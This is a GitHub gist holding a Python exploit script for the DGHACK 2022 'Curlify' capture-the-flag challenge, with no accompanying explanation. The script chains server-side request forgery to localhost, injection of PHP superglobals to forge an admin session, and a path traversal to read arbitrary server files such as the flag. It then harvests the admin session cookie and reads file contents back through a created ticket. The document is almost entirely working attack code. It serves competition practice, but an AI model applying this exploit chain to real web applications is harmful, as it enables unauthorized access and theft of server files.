Skip to content

Instantly share code, notes, and snippets.

@xl00t

xl00t/exploit.py

Created November 24, 2022 17:12
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save xl00t/a73c002aec15fc2a10ded4ec750cb757 to your computer and use it in GitHub Desktop.
Save xl00t/a73c002aec15fc2a10ded4ec750cb757 to your computer and use it in GitHub Desktop.
Download ZIP
DGHACK 2022 - Curlify
Raw
exploit.py
import requests
import sys
file = "/var/www/html/admin_panel/user_prefs/flag.php"
if len(sys.argv) > 1:
file = sys.argv[1]
headers = {
"User-Agent": "DGHACK/1.0 (Curlify)"
}
payload = {
"url":f"http://127.0.0.1/admin_panel/index.php?_POST[username]=admin&_COOKIE[remember_me]=admin7a988e11680f9e151f6f46808690d5ca&_SERVER[HTTP_ACCEPT_LANGUAGE]=blabla&DEFAULT_LANGUAGE=../../../../../../../../{file}&_SESSION[userid]=1"
}
r = requests.post("http://curlify3.chall.malicecyber.com/index.php", data=payload, headers=headers).text
admin_cookie = r.split('PHPSESSID=')[1].split(';')[0]
payload = {
"author":"admin",
"type":"incident",
"assignee":"admin",
"description":"aaa"
}
r = requests.post("http://curlify3.chall.malicecyber.com/admin_panel/task.php", data=payload, cookies={'PHPSESSID':admin_cookie}).text
ticket_id = r.split('Ticket with id ')[1].split(' created')[0]
payload = {
"url":f"http://127.0.0.1/admin_panel/tasks/task_{ticket_id}.txt"
}
r = requests.post("http://curlify3.chall.malicecyber.com/index.php", data=payload).text
if not "Preferences:" in r:
exit()
print(r.split('<code class="language-html">HTTP/1.1')[1].split('</code></pre>\n')[0].split('Preferences: ')[1].split('\n\nAuthor:')[0])
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment